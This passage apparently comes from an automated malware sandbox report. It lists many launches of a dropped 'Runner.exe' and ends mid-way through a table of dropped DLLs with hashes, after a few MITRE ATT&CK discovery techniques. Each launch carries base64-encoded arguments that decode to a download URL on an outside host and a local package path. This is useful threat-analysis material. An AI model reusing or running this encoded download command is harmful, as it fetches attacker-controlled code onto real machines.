    "C:\Users\Admin\AppData\Local\72D3035B-7212-D04F-9CE5-327A94877C47\Runner.exe" --UpNav YgByAG8AdwBzAGUAcgAuAGkAZAAzADEAMgAuAHMAbwBmAHQALQBjAGQAbgAuAGMAbwBtAC8ARQB4AHAAUABrAGcALgBwAGgAcAA/AHAAPQAwACYAcwA9ADUA --DownNav QwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcADcAMgBEADMAMAAzADUAQgAtADcAMgAxADIALQBEADAANABGAC0AOQBDAEUANQAtADMAMgA3AEEAOQA0ADgANwA3AEMANAA3AFwAVQBwAGQAYQB0AGUAXABFAHgAdABQAGsAZwAwAA==
    3⤵
    - Executes dropped EXE
    PID:1564
- - C:\Users\Admin\AppData\Local\72D3035B-7212-D04F-9CE5-327A94877C47\Runner.exe
    "C:\Users\Admin\AppData\Local\72D3035B-7212-D04F-9CE5-327A94877C47\Runner.exe" --UpNav YgByAG8AdwBzAGUAcgAuAGkAZAAzADEAMgAuAHMAbwBmAHQALQBjAGQAbgAuAGMAbwBtAC8ARQB4AHAAUABrAGcALgBwAGgAcAA/AHAAPQAwACYAcwA9ADUA --DownNav QwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcADcAMgBEADMAMAAzADUAQgAtADcAMgAxADIALQBEADAANABGAC0AOQBDAEUANQAtADMAMgA3AEEAOQA0ADgANwA3AEMANAA3AFwAVQBwAGQAYQB0AGUAXABFAHgAdABQAGsAZwAwAA==
    3⤵
    - Executes dropped EXE
    PID:1264
- - C:\Users\Admin\AppData\Local\72D3035B-7212-D04F-9CE5-327A94877C47\Runner.exe
    "C:\Users\Admin\AppData\Local\72D3035B-7212-D04F-9CE5-327A94877C47\Runner.exe" --UpNav YgByAG8AdwBzAGUAcgAuAGkAZAAzADEAMgAuAHMAbwBmAHQALQBjAGQAbgAuAGMAbwBtAC8ARQB4AHAAUABrAGcALgBwAGgAcAA/AHAAPQAwACYAcwA9ADUA --DownNav QwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcADcAMgBEADMAMAAzADUAQgAtADcAMgAxADIALQBEADAANABGAC0AOQBDAEUANQAtADMAMgA3AEEAOQA0ADgANwA3AEMANAA3AFwAVQBwAGQAYQB0AGUAXABFAHgAdABQAGsAZwAwAA==
    3⤵
    - Executes dropped EXE
    PID:2372
- - C:\Users\Admin\AppData\Local\72D3035B-7212-D04F-9CE5-327A94877C47\Runner.exe
    "C:\Users\Admin\AppData\Local\72D3035B-7212-D04F-9CE5-327A94877C47\Runner.exe" --UpNav YgByAG8AdwBzAGUAcgAuAGkAZAAzADEAMgAuAHMAbwBmAHQALQBjAGQAbgAuAGMAbwBtAC8ARQB4AHAAUABrAGcALgBwAGgAcAA/AHAAPQAwACYAcwA9ADUA --DownNav QwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcADcAMgBEADMAMAAzADUAQgAtADcAMgAxADIALQBEADAANABGAC0AOQBDAEUANQAtADMAMgA3AEEAOQA0ADgANwA3AEMANAA3AFwAVQBwAGQAYQB0AGUAXABFAHgAdABQAGsAZwAwAA==
    3⤵
    - Executes dropped EXE
    PID:472
- - C:\Users\Admin\AppData\Local\72D3035B-7212-D04F-9CE5-327A94877C47\Runner.exe
    "C:\Users\Admin\AppData\Local\72D3035B-7212-D04F-9CE5-327A94877C47\Runner.exe" --UpNav YgByAG8AdwBzAGUAcgAuAGkAZAAzADEAMgAuAHMAbwBmAHQALQBjAGQAbgAuAGMAbwBtAC8ARQB4AHAAUABrAGcALgBwAGgAcAA/AHAAPQAwACYAcwA9ADUA --DownNav QwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcADcAMgBEADMAMAAzADUAQgAtADcAMgAxADIALQBEADAANABGAC0AOQBDAEUANQAtADMAMgA3AEEAOQA0ADgANwA3AEMANAA3AFwAVQBwAGQAYQB0AGUAXABFAHgAdABQAGsAZwAwAA==
    3⤵
    - Executes dropped EXE
    PID:2316
- - C:\Users\Admin\AppData\Local\72D3035B-7212-D04F-9CE5-327A94877C47\Runner.exe
    "C:\Users\Admin\AppData\Local\72D3035B-7212-D04F-9CE5-327A94877C47\Runner.exe" --UpNav YgByAG8AdwBzAGUAcgAuAGkAZAAzADEAMgAuAHMAbwBmAHQALQBjAGQAbgAuAGMAbwBtAC8ARQB4AHAAUABrAGcALgBwAGgAcAA/AHAAPQAwACYAcwA9ADUA --DownNav QwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcADcAMgBEADMAMAAzADUAQgAtADcAMgAxADIALQBEADAANABGAC0AOQBDAEUANQAtADMAMgA3AEEAOQA0ADgANwA3AEMANAA3AFwAVQBwAGQAYQB0AGUAXABFAHgAdABQAGsAZwAwAA==
    3⤵
    - Executes dropped EXE
    PID:1600
- - C:\Users\Admin\AppData\Local\72D3035B-7212-D04F-9CE5-327A94877C47\Runner.exe
    "C:\Users\Admin\AppData\Local\72D3035B-7212-D04F-9CE5-327A94877C47\Runner.exe" --UpNav YgByAG8AdwBzAGUAcgAuAGkAZAAzADEAMgAuAHMAbwBmAHQALQBjAGQAbgAuAGMAbwBtAC8ARQB4AHAAUABrAGcALgBwAGgAcAA/AHAAPQAwACYAcwA9ADUA --DownNav QwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcADcAMgBEADMAMAAzADUAQgAtADcAMgAxADIALQBEADAANABGAC0AOQBDAEUANQAtADMAMgA3AEEAOQA0ADgANwA3AEMANAA3AFwAVQBwAGQAYQB0AGUAXABFAHgAdABQAGsAZwAwAA==
    3⤵
    - Executes dropped EXE
    PID:2584
- - C:\Users\Admin\AppData\Local\72D3035B-7212-D04F-9CE5-327A94877C47\Runner.exe
    "C:\Users\Admin\AppData\Local\72D3035B-7212-D04F-9CE5-327A94877C47\Runner.exe" --UpNav YgByAG8AdwBzAGUAcgAuAGkAZAAzADEAMgAuAHMAbwBmAHQALQBjAGQAbgAuAGMAbwBtAC8ARQB4AHAAUABrAGcALgBwAGgAcAA/AHAAPQAwACYAcwA9ADUA --DownNav QwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcADcAMgBEADMAMAAzADUAQgAtADcAMgAxADIALQBEADAANABGAC0AOQBDAEUANQAtADMAMgA3AEEAOQA0ADgANwA3AEMANAA3AFwAVQBwAGQAYQB0AGUAXABFAHgAdABQAGsAZwAwAA==
    3⤵
    - Executes dropped EXE
    PID:2532
- - C:\Users\Admin\AppData\Local\72D3035B-7212-D04F-9CE5-327A94877C47\Runner.exe
    "C:\Users\Admin\AppData\Local\72D3035B-7212-D04F-9CE5-327A94877C47\Runner.exe" --UpNav YgByAG8AdwBzAGUAcgAuAGkAZAAzADEAMgAuAHMAbwBmAHQALQBjAGQAbgAuAGMAbwBtAC8ARQB4AHAAUABrAGcALgBwAGgAcAA/AHAAPQAwACYAcwA9ADUA --DownNav QwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcADcAMgBEADMAMAAzADUAQgAtADcAMgAxADIALQBEADAANABGAC0AOQBDAEUANQAtADMAMgA3AEEAOQA0ADgANwA3AEMANAA3AFwAVQBwAGQAYQB0AGUAXABFAHgAdABQAGsAZwAwAA==
    3⤵
    - Executes dropped EXE
    PID:2668
- - C:\Users\Admin\AppData\Local\72D3035B-7212-D04F-9CE5-327A94877C47\Runner.exe
    "C:\Users\Admin\AppData\Local\72D3035B-7212-D04F-9CE5-327A94877C47\Runner.exe" --UpNav YgByAG8AdwBzAGUAcgAuAGkAZAAzADEAMgAuAHMAbwBmAHQALQBjAGQAbgAuAGMAbwBtAC8ARQB4AHAAUABrAGcALgBwAGgAcAA/AHAAPQAwACYAcwA9ADUA --DownNav QwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcADcAMgBEADMAMAAzADUAQgAtADcAMgAxADIALQBEADAANABGAC0AOQBDAEUANQAtADMAMgA3AEEAOQA0ADgANwA3AEMANAA3AFwAVQBwAGQAYQB0AGUAXABFAHgAdABQAGsAZwAwAA==
    3⤵
    - Executes dropped EXE
    PID:2072
- - C:\Users\Admin\AppData\Local\72D3035B-7212-D04F-9CE5-327A94877C47\Runner.exe
    "C:\Users\Admin\AppData\Local\72D3035B-7212-D04F-9CE5-327A94877C47\Runner.exe" --UpNav YgByAG8AdwBzAGUAcgAuAGkAZAAzADEAMgAuAHMAbwBmAHQALQBjAGQAbgAuAGMAbwBtAC8ARQB4AHAAUABrAGcALgBwAGgAcAA/AHAAPQAwACYAcwA9ADUA --DownNav QwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcADcAMgBEADMAMAAzADUAQgAtADcAMgAxADIALQBEADAANABGAC0AOQBDAEUANQAtADMAMgA3AEEAOQA0ADgANwA3AEMANAA3AFwAVQBwAGQAYQB0AGUAXABFAHgAdABQAGsAZwAwAA==
    3⤵
    - Executes dropped EXE
    PID:3060
- - C:\Users\Admin\AppData\Local\72D3035B-7212-D04F-9CE5-327A94877C47\Runner.exe
    "C:\Users\Admin\AppData\Local\72D3035B-7212-D04F-9CE5-327A94877C47\Runner.exe" --UpNav YgByAG8AdwBzAGUAcgAuAGkAZAAzADEAMgAuAHMAbwBmAHQALQBjAGQAbgAuAGMAbwBtAC8ARQB4AHAAUABrAGcALgBwAGgAcAA/AHAAPQAwACYAcwA9ADUA --DownNav QwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcADcAMgBEADMAMAAzADUAQgAtADcAMgAxADIALQBEADAANABGAC0AOQBDAEUANQAtADMAMgA3AEEAOQA0ADgANwA3AEMANAA3AFwAVQBwAGQAYQB0AGUAXABFAHgAdABQAGsAZwAwAA==
    3⤵
    PID:2276
- - C:\Users\Admin\AppData\Local\72D3035B-7212-D04F-9CE5-327A94877C47\Runner.exe
    "C:\Users\Admin\AppData\Local\72D3035B-7212-D04F-9CE5-327A94877C47\Runner.exe" --UpNav YgByAG8AdwBzAGUAcgAuAGkAZAAzADEAMgAuAHMAbwBmAHQALQBjAGQAbgAuAGMAbwBtAC8ARQB4AHAAUABrAGcALgBwAGgAcAA/AHAAPQAwACYAcwA9ADUA --DownNav QwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcADcAMgBEADMAMAAzADUAQgAtADcAMgAxADIALQBEADAANABGAC0AOQBDAEUANQAtADMAMgA3AEEAOQA0ADgANwA3AEMANAA3AFwAVQBwAGQAYQB0AGUAXABFAHgAdABQAGsAZwAwAA==
    3⤵
    PID:1720
- - C:\Users\Admin\AppData\Local\72D3035B-7212-D04F-9CE5-327A94877C47\Runner.exe
    "C:\Users\Admin\AppData\Local\72D3035B-7212-D04F-9CE5-327A94877C47\Runner.exe" --UpNav YgByAG8AdwBzAGUAcgAuAGkAZAAzADEAMgAuAHMAbwBmAHQALQBjAGQAbgAuAGMAbwBtAC8ARQB4AHAAUABrAGcALgBwAGgAcAA/AHAAPQAwACYAcwA9ADUA --DownNav QwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcADcAMgBEADMAMAAzADUAQgAtADcAMgAxADIALQBEADAANABGAC0AOQBDAEUANQAtADMAMgA3AEEAOQA0ADgANwA3AEMANAA3AFwAVQBwAGQAYQB0AGUAXABFAHgAdABQAGsAZwAwAA==
    3⤵
    PID:3004
- - C:\Users\Admin\AppData\Local\72D3035B-7212-D04F-9CE5-327A94877C47\Runner.exe
    "C:\Users\Admin\AppData\Local\72D3035B-7212-D04F-9CE5-327A94877C47\Runner.exe" --UpNav YgByAG8AdwBzAGUAcgAuAGkAZAAzADEAMgAuAHMAbwBmAHQALQBjAGQAbgAuAGMAbwBtAC8ARQB4AHAAUABrAGcALgBwAGgAcAA/AHAAPQAwACYAcwA9ADUA --DownNav QwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcADcAMgBEADMAMAAzADUAQgAtADcAMgAxADIALQBEADAANABGAC0AOQBDAEUANQAtADMAMgA3AEEAOQA0ADgANwA3AEMANAA3AFwAVQBwAGQAYQB0AGUAXABFAHgAdABQAGsAZwAwAA==
    3⤵
    PID:2848
- - C:\Users\Admin\AppData\Local\72D3035B-7212-D04F-9CE5-327A94877C47\Runner.exe
    "C:\Users\Admin\AppData\Local\72D3035B-7212-D04F-9CE5-327A94877C47\Runner.exe" --UpNav YgByAG8AdwBzAGUAcgAuAGkAZAAzADEAMgAuAHMAbwBmAHQALQBjAGQAbgAuAGMAbwBtAC8ARQB4AHAAUABrAGcALgBwAGgAcAA/AHAAPQAwACYAcwA9ADUA --DownNav QwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcADcAMgBEADMAMAAzADUAQgAtADcAMgAxADIALQBEADAANABGAC0AOQBDAEUANQAtADMAMgA3AEEAOQA0ADgANwA3AEMANAA3AFwAVQBwAGQAYQB0AGUAXABFAHgAdABQAGsAZwAwAA==
    3⤵
    PID:380
- - C:\Users\Admin\AppData\Local\72D3035B-7212-D04F-9CE5-327A94877C47\Runner.exe
    "C:\Users\Admin\AppData\Local\72D3035B-7212-D04F-9CE5-327A94877C47\Runner.exe" --UpNav YgByAG8AdwBzAGUAcgAuAGkAZAAzADEAMgAuAHMAbwBmAHQALQBjAGQAbgAuAGMAbwBtAC8ARQB4AHAAUABrAGcALgBwAGgAcAA/AHAAPQAwACYAcwA9ADUA --DownNav QwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcADcAMgBEADMAMAAzADUAQgAtADcAMgAxADIALQBEADAANABGAC0AOQBDAEUANQAtADMAMgA3AEEAOQA0ADgANwA3AEMANAA3AFwAVQBwAGQAYQB0AGUAXABFAHgAdABQAGsAZwAwAA==
    3⤵
    PID:1240
- - C:\Users\Admin\AppData\Local\72D3035B-7212-D04F-9CE5-327A94877C47\Runner.exe
    "C:\Users\Admin\AppData\Local\72D3035B-7212-D04F-9CE5-327A94877C47\Runner.exe" --UpNav YgByAG8AdwBzAGUAcgAuAGkAZAAzADEAMgAuAHMAbwBmAHQALQBjAGQAbgAuAGMAbwBtAC8ARQB4AHAAUABrAGcALgBwAGgAcAA/AHAAPQAwACYAcwA9ADUA --DownNav QwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcADcAMgBEADMAMAAzADUAQgAtADcAMgAxADIALQBEADAANABGAC0AOQBDAEUANQAtADMAMgA3AEEAOQA0ADgANwA3AEMANAA3AFwAVQBwAGQAYQB0AGUAXABFAHgAdABQAGsAZwAwAA==
    3⤵
    PID:2536
- - C:\Users\Admin\AppData\Local\72D3035B-7212-D04F-9CE5-327A94877C47\Runner.exe
    "C:\Users\Admin\AppData\Local\72D3035B-7212-D04F-9CE5-327A94877C47\Runner.exe" --UpNav YgByAG8AdwBzAGUAcgAuAGkAZAAzADEAMgAuAHMAbwBmAHQALQBjAGQAbgAuAGMAbwBtAC8ARQB4AHAAUABrAGcALgBwAGgAcAA/AHAAPQAwACYAcwA9ADUA --DownNav QwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcADcAMgBEADMAMAAzADUAQgAtADcAMgAxADIALQBEADAANABGAC0AOQBDAEUANQAtADMAMgA3AEEAOQA0ADgANwA3AEMANAA3AFwAVQBwAGQAYQB0AGUAXABFAHgAdABQAGsAZwAwAA==
    3⤵
    PID:2056
- - C:\Users\Admin\AppData\Local\72D3035B-7212-D04F-9CE5-327A94877C47\Runner.exe
    "C:\Users\Admin\AppData\Local\72D3035B-7212-D04F-9CE5-327A94877C47\Runner.exe" --UpNav YgByAG8AdwBzAGUAcgAuAGkAZAAzADEAMgAuAHMAbwBmAHQALQBjAGQAbgAuAGMAbwBtAC8ARQB4AHAAUABrAGcALgBwAGgAcAA/AHAAPQAwACYAcwA9ADUA --DownNav QwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcADcAMgBEADMAMAAzADUAQgAtADcAMgAxADIALQBEADAANABGAC0AOQBDAEUANQAtADMAMgA3AEEAOQA0ADgANwA3AEMANAA3AFwAVQBwAGQAYQB0AGUAXABFAHgAdABQAGsAZwAwAA==
    3⤵
    PID:1444
- - C:\Users\Admin\AppData\Local\72D3035B-7212-D04F-9CE5-327A94877C47\Runner.exe
    "C:\Users\Admin\AppData\Local\72D3035B-7212-D04F-9CE5-327A94877C47\Runner.exe" --UpNav YgByAG8AdwBzAGUAcgAuAGkAZAAzADEAMgAuAHMAbwBmAHQALQBjAGQAbgAuAGMAbwBtAC8ARQB4AHAAUABrAGcALgBwAGgAcAA/AHAAPQAwACYAcwA9ADUA --DownNav QwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcADcAMgBEADMAMAAzADUAQgAtADcAMgAxADIALQBEADAANABGAC0AOQBDAEUANQAtADMAMgA3AEEAOQA0ADgANwA3AEMANAA3AFwAVQBwAGQAYQB0AGUAXABFAHgAdABQAGsAZwAwAA==
    3⤵
    PID:2776
- - C:\Users\Admin\AppData\Local\72D3035B-7212-D04F-9CE5-327A94877C47\Runner.exe
    "C:\Users\Admin\AppData\Local\72D3035B-7212-D04F-9CE5-327A94877C47\Runner.exe" --UpNav YgByAG8AdwBzAGUAcgAuAGkAZAAzADEAMgAuAHMAbwBmAHQALQBjAGQAbgAuAGMAbwBtAC8ARQB4AHAAUABrAGcALgBwAGgAcAA/AHAAPQAwACYAcwA9ADUA --DownNav QwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcADcAMgBEADMAMAAzADUAQgAtADcAMgAxADIALQBEADAANABGAC0AOQBDAEUANQAtADMAMgA3AEEAOQA0ADgANwA3AEMANAA3AFwAVQBwAGQAYQB0AGUAXABFAHgAdABQAGsAZwAwAA==
    3⤵
    PID:808
- - C:\Users\Admin\AppData\Local\72D3035B-7212-D04F-9CE5-327A94877C47\Runner.exe
    "C:\Users\Admin\AppData\Local\72D3035B-7212-D04F-9CE5-327A94877C47\Runner.exe" --UpNav YgByAG8AdwBzAGUAcgAuAGkAZAAzADEAMgAuAHMAbwBmAHQALQBjAGQAbgAuAGMAbwBtAC8ARQB4AHAAUABrAGcALgBwAGgAcAA/AHAAPQAwACYAcwA9ADUA --DownNav QwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcADcAMgBEADMAMAAzADUAQgAtADcAMgAxADIALQBEADAANABGAC0AOQBDAEUANQAtADMAMgA3AEEAOQA0ADgANwA3AEMANAA3AFwAVQBwAGQAYQB0AGUAXABFAHgAdABQAGsAZwAwAA==
    3⤵
    PID:1736
- - C:\Users\Admin\AppData\Local\72D3035B-7212-D04F-9CE5-327A94877C47\Runner.exe
    "C:\Users\Admin\AppData\Local\72D3035B-7212-D04F-9CE5-327A94877C47\Runner.exe" --UpNav YgByAG8AdwBzAGUAcgAuAGkAZAAzADEAMgAuAHMAbwBmAHQALQBjAGQAbgAuAGMAbwBtAC8ARQB4AHAAUABrAGcALgBwAGgAcAA/AHAAPQAwACYAcwA9ADUA --DownNav QwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcADcAMgBEADMAMAAzADUAQgAtADcAMgAxADIALQBEADAANABGAC0AOQBDAEUANQAtADMAMgA3AEEAOQA0ADgANwA3AEMANAA3AFwAVQBwAGQAYQB0AGUAXABFAHgAdABQAGsAZwAwAA==
    3⤵
    PID:1536
- - C:\Users\Admin\AppData\Local\72D3035B-7212-D04F-9CE5-327A94877C47\Runner.exe
    "C:\Users\Admin\AppData\Local\72D3035B-7212-D04F-9CE5-327A94877C47\Runner.exe" --UpNav YgByAG8AdwBzAGUAcgAuAGkAZAAzADEAMgAuAHMAbwBmAHQALQBjAGQAbgAuAGMAbwBtAC8ARQB4AHAAUABrAGcALgBwAGgAcAA/AHAAPQAwACYAcwA9ADUA --DownNav QwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcADcAMgBEADMAMAAzADUAQgAtADcAMgAxADIALQBEADAANABGAC0AOQBDAEUANQAtADMAMgA3AEEAOQA0ADgANwA3AEMANAA3AFwAVQBwAGQAYQB0AGUAXABFAHgAdABQAGsAZwAwAA==
    3⤵
    PID:2284
- - C:\Users\Admin\AppData\Local\72D3035B-7212-D04F-9CE5-327A94877C47\Runner.exe
    "C:\Users\Admin\AppData\Local\72D3035B-7212-D04F-9CE5-327A94877C47\Runner.exe" --UpNav YgByAG8AdwBzAGUAcgAuAGkAZAAzADEAMgAuAHMAbwBmAHQALQBjAGQAbgAuAGMAbwBtAC8ARQB4AHAAUABrAGcALgBwAGgAcAA/AHAAPQAwACYAcwA9ADUA --DownNav QwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcADcAMgBEADMAMAAzADUAQgAtADcAMgAxADIALQBEADAANABGAC0AOQBDAEUANQAtADMAMgA3AEEAOQA0ADgANwA3AEMANAA3AFwAVQBwAGQAYQB0AGUAXABFAHgAdABQAGsAZwAwAA==
    3⤵
    PID:2688
- - C:\Users\Admin\AppData\Local\72D3035B-7212-D04F-9CE5-327A94877C47\Runner.exe
    "C:\Users\Admin\AppData\Local\72D3035B-7212-D04F-9CE5-327A94877C47\Runner.exe" --UpNav YgByAG8AdwBzAGUAcgAuAGkAZAAzADEAMgAuAHMAbwBmAHQALQBjAGQAbgAuAGMAbwBtAC8ARQB4AHAAUABrAGcALgBwAGgAcAA/AHAAPQAwACYAcwA9ADUA --DownNav QwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcADcAMgBEADMAMAAzADUAQgAtADcAMgAxADIALQBEADAANABGAC0AOQBDAEUANQAtADMAMgA3AEEAOQA0ADgANwA3AEMANAA3AFwAVQBwAGQAYQB0AGUAXABFAHgAdABQAGsAZwAwAA==
    3⤵
    PID:1044
- - C:\Users\Admin\AppData\Local\72D3035B-7212-D04F-9CE5-327A94877C47\Runner.exe
    "C:\Users\Admin\AppData\Local\72D3035B-7212-D04F-9CE5-327A94877C47\Runner.exe" --UpNav YgByAG8AdwBzAGUAcgAuAGkAZAAzADEAMgAuAHMAbwBmAHQALQBjAGQAbgAuAGMAbwBtAC8ARQB4AHAAUABrAGcALgBwAGgAcAA/AHAAPQAwACYAcwA9ADUA --DownNav QwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcADcAMgBEADMAMAAzADUAQgAtADcAMgAxADIALQBEADAANABGAC0AOQBDAEUANQAtADMAMgA3AEEAOQA0ADgANwA3AEMANAA3AFwAVQBwAGQAYQB0AGUAXABFAHgAdABQAGsAZwAwAA==
    3⤵
    PID:660
- - C:\Users\Admin\AppData\Local\72D3035B-7212-D04F-9CE5-327A94877C47\Runner.exe
    "C:\Users\Admin\AppData\Local\72D3035B-7212-D04F-9CE5-327A94877C47\Runner.exe" --UpNav YgByAG8AdwBzAGUAcgAuAGkAZAAzADEAMgAuAHMAbwBmAHQALQBjAGQAbgAuAGMAbwBtAC8ARQB4AHAAUABrAGcALgBwAGgAcAA/AHAAPQAwACYAcwA9ADUA --DownNav QwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcADcAMgBEADMAMAAzADUAQgAtADcAMgAxADIALQBEADAANABGAC0AOQBDAEUANQAtADMAMgA3AEEAOQA0ADgANwA3AEMANAA3AFwAVQBwAGQAYQB0AGUAXABFAHgAdABQAGsAZwAwAA==
    3⤵
    PID:2340
- - C:\Users\Admin\AppData\Local\72D3035B-7212-D04F-9CE5-327A94877C47\Runner.exe
    "C:\Users\Admin\AppData\Local\72D3035B-7212-D04F-9CE5-327A94877C47\Runner.exe" --UpNav YgByAG8AdwBzAGUAcgAuAGkAZAAzADEAMgAuAHMAbwBmAHQALQBjAGQAbgAuAGMAbwBtAC8ARQB4AHAAUABrAGcALgBwAGgAcAA/AHAAPQAwACYAcwA9ADUA --DownNav QwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcADcAMgBEADMAMAAzADUAQgAtADcAMgAxADIALQBEADAANABGAC0AOQBDAEUANQAtADMAMgA3AEEAOQA0ADgANwA3AEMANAA3AFwAVQBwAGQAYQB0AGUAXABFAHgAdABQAGsAZwAwAA==
    3⤵
    PID:2400
- - C:\Users\Admin\AppData\Local\72D3035B-7212-D04F-9CE5-327A94877C47\Runner.exe
    "C:\Users\Admin\AppData\Local\72D3035B-7212-D04F-9CE5-327A94877C47\Runner.exe" --UpNav YgByAG8AdwBzAGUAcgAuAGkAZAAzADEAMgAuAHMAbwBmAHQALQBjAGQAbgAuAGMAbwBtAC8ARQB4AHAAUABrAGcALgBwAGgAcAA/AHAAPQAwACYAcwA9ADUA --DownNav QwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcADcAMgBEADMAMAAzADUAQgAtADcAMgAxADIALQBEADAANABGAC0AOQBDAEUANQAtADMAMgA3AEEAOQA0ADgANwA3AEMANAA3AFwAVQBwAGQAYQB0AGUAXABFAHgAdABQAGsAZwAwAA==
    3⤵
    PID:624

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\72D3035B-7212-D04F-9CE5-327A94877C47\Modules\cdp.dll

Filesize
91KB

MD5
2f369f9928242f730d3cf48678158111

SHA1
f31361fb3ed6f6654ad921cdc59786df4c10885a

SHA256
a056ad6496931b0c0a9405cf4f7a34db68c3b78b30d4907f9472994b836ea022

SHA512
c22c479183f66b65e1cf5b7ed75e30f18db5fd7f6427c04385990d181c53216df33994f296ed235357cc0f22e4d437e97983f910ec67fc7e52fe48fafbbebabe

Download Submit
C:\Users\Admin\AppData\Local\72D3035B-7212-D04F-9CE5-327A94877C47\Modules\nvs.dll

Filesize
90KB

MD5
ce70e808b2bcdf50f9fec5a965503af8

SHA1
d8168523669f119d3e603f9569078e36362680f4

SHA256
3a35ed22fe448967d3bbb5ac16710f755760f2a083f05b22884abe811d688039

SHA512
2449dc3716362a1a572fbf7f9472ec0d975dca07cd6d4a7cf50c72c62f9ace9a6d9f7f7f3702dcf32a8bbe81b3f38c3248ac98709d3b4f26d329a6f0f7fb770c

Download Submit
C:\Users\Admin\AppData\Local\72D3035B-7212-D04F-9CE5-327A94877C47\Update\ExtPkg0

Filesize
122B

MD5
63bfc22e886a88b4a7ad8bb9f6ae7cb4

SHA1
fb11f297b81cd271d92a7d9636b2359691709709

SHA256
782ac03b708653aec3db845a028fcb89f68ebfc3242bf6402116d9749ad86a0d

SHA512
47d73ca7e0d36a00e00f7d311abe57b38803d5f30522d75d7a369fdf802c2f893aaa47d3795e8681d91d0b6b914725f709681de4ac810acd1a1923a36e9da6d9

Download Submit
C:\Users\Admin\AppData\Local\Temp\7BCE567A-7556-CC4D-9563-461F6AD885D1\MSVCP110.dll

Filesize
522KB

MD5
3e29914113ec4b968ba5eb1f6d194a0a

SHA1
557b67e372e85eb39989cb53cffd3ef1adabb9fe

SHA256
c8d5572ca8d7624871188f0acabc3ae60d4c5a4f6782d952b9038de3bc28b39a

SHA512
75078c9eaa5a7ae39408e5db1ce7dbce5a3180d1c644bcb5e481b0810b07cb7d001d68d1b4f462cd5355e98951716f041ef570fcc866d289a68ea19b3f500c43

Download Submit
C:\Users\Admin\AppData\Local\Temp\7BCE567A-7556-CC4D-9563-461F6AD885D1\Modules\crm.dll

Filesize
104KB

MD5
d925422843f1e14f6504456764219367

SHA1
493c1992685c7413a9497aab830175ba92b1f80e

SHA256
